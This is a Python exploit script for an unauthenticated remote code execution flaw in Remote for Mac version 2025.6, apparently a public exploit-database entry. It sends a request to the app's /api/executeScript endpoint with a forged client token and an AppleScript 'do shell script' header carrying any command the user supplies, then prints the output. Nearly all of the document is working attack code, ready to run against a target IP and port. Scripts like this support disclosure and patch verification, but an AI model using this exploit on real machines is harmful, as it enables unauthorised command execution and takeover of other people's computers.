# Exploit Title: Remote for Mac 2025.6 -  Unauthenticated RCE
# Date: 2025-05-26
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://cherpake.com/
# Software Link: https://cherpake.com/latest.php?os=mac
# Version: 2025.6
# Tested on: macOS Mojave 10.14.6
#!/usr/bin/env python3
'''

Description:

- Exploits the executeScript API endpoint in Remote for Mac application
- Works when "Allow unknown devices" setting is enabled (default: disabled)


Vulnerable Component:
- /api/executeScript endpoint with missing authentication checks

Usage: python3 exploit.py <target_ip> <port> "<command>"
Example: python3 exploit.py 192.168.1.100 443 "whoami"

'''

import requests
import sys
import json
from urllib3.exceptions import InsecureRequestWarning

# Disable SSL warnings
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

if len(sys.argv) < 4:
    print(f"Usage: {sys.argv[0]} <IP> <PORT> <COMMAND>")
    print(f"Example: {sys.argv[0]} 192.168.1.100 443 \"whoami\"")
    sys.exit(1)

ip = sys.argv[1]
port = sys.argv[2]
cmd = " ".join(sys.argv[3:])

try:
    response = requests.get(
        f"https://{ip}:{port}/api/executeScript",
        headers={
            "X-ClientToken": "1337",
            "X-HostName": "apple iMac",
            "X-HostFullModel": "iMac17,1",
            "X-Script": f"do shell script \"{cmd}\"",
            "X-ScriptName": "exploit",
            "X-ScriptDelay": "0"
        },
        verify=False,
        timeout=10
    )

    result = json.loads(response.text)
    print(result.get("result", "No output").strip())

except Exception as e:
    print(f"Error: {e}")
    sys.exit(1)